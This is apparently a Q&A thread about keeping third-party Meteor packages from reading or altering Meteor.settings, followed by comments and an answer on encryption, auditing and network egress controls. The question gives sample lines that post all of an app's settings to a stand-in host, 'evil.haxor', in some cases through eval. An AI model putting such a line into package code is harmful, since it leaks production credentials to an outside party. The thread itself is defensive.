# How can I prevent 3rd-party packages from having direct access to Meteor.settings?

Tags: security, meteor, meteorite

I've tested, and the two things are allowed in 3rd party pacakges:

```
Meteor.settings.foo = "foobar"                   # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
```

I want to be able to protect my settings from 3rd parties.

Scenario:

1. I have sensitive data in my `Meteor.settings` file, especially in production, because that is the current best-practice place to put them.
2. I use a 3rd party meteor package such as `iron:router`, but possibly one by a lesser known author.
3. One of the 3rd party packages looks up my `Meteor.settings` and does an HTTP post on which some of my settings are sent along.

`HTTP.post('http://evil.haxor', Meteor.settings) # all ur settings`

**Boom**. Instantly I've leaked my production credentials, my payment gateway, Amazon, or whatever. Worse, as far as I know, the code that steals my `settings` might be loaded in and `eval`'d so I don't even see the string "Meteor.settings" in the source of the package.

I've tested, and the two things are allowed in 3rd party pacakges:

```
Meteor.settings.foo = "foobar"                   # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
```

I'm amenable to hacky solutions. I know the Meteor team might not address this right away, given all on their plates (Windows support, a non-Mongo DB).. I just want to be able to provide this level of security to my company, for whom I think it would concern their auditors to discover this level of openness. Otherwise I fear I'm stuck manually security auditing every package I use.

Thank you for your consideration!

Edit: I see now that the risk of a package seeing/stealing the settings is essentially the same problem as any package reading (or writing) your filesystem. And the best way to address that would be to encrypt. That's a valid proposal, which I can use immediately. However, I think there could, and should be notions of 'package-scoped' settings. Also, the dialogue with commenters made me realize that the other issue, the issue of settings being (easily) modifiable at runtime, could be addressed via making the settings object read-only, using ES5 properties.

Comment: possible duplicate of [Should I be worried about 3rd-party packages accessing my settings.json?](http://stackoverflow.com/questions/28286408/should-i-be-worried-about-3rd-party-packages-accessing-my-settings-json)

Comment: theres a difference between what node exposes via modules, and what Meteor exposes in the packages' environment. You could know if a module accessed your file system. You wouldn't know if a package made use of settings that were exposed in the same process. I think there are security tightenings that can be made specifically for settings.

Comment: Have you considered encrypting your data? As @stubailo said, there's probably no way to be 100% sure that the data is secure because the modules will have access to your filesystem anyway (this is problem is not Meteor specific), but if you only want to deny very trivial attacks, similar to what you described above, then I think it may be good enough for your needs.

Comment: I think encrypting the data might be the solution that could work for the short term, @apendua. I would vote that the answer. Though I'm intrigued by the thought of making the settings object read-only, which addresses a somewhat different issue.

Comment: What would you encrypt it with that the offending package would not be able to decrypt?

Comment: @stubailo Your point, if I understand right, is that whatever decryption keys/libraries that my code would use, the offending package would have access to as well. I agree, but I assume it would not know, a priori, what or how to decrypt. Whereas today, there's a good chance that if a package emailed itself Meteor.settings, it'd nab some secrets in the raw.

Comment: The other answer is just to audit the source of packages that are not commonly used before adding them to your app.

Comment: I don't think that packages can access the Meteor.settings - I had a package that I wanted to configure that way and had problems.

Comment: @Pat - I definitely saw that it could.

Comment: @DeanRadcliffe - good to know! I might have misunderstood the problem I was having.

Comment: @stubailo I've created a topic on meteor forum to further discuss this issue. Would be great if you commented on that one:
https://forums.meteor.com/t/proposal-improving-meteor-settings-security/6930

Answer (score 0):

A malicious npm package can come with native code extensions, access the filesystem directly, and in general do anything the rest of the code in the app can do.

I see 2 (partial) solutions:

1. set up a firewall with outbound rules and logging. Unfortunately if your application communicates with any sort of social network (facebook, twitter) then the firewall idea will not handle malware that uses twitter as a way to transmit data. But maybe it would help?
2. lock down the DNS resolution, provide a whitelist of DNS lookups. This way you could spot if the app starts trying to communicate with 'evil.haxor'

There are other more advanced detectors - but at some point a hacker is going to go after the other services running on the box and not try for modifying your code.

Good luck. And its good to be paranoid -- because they really are out to get you.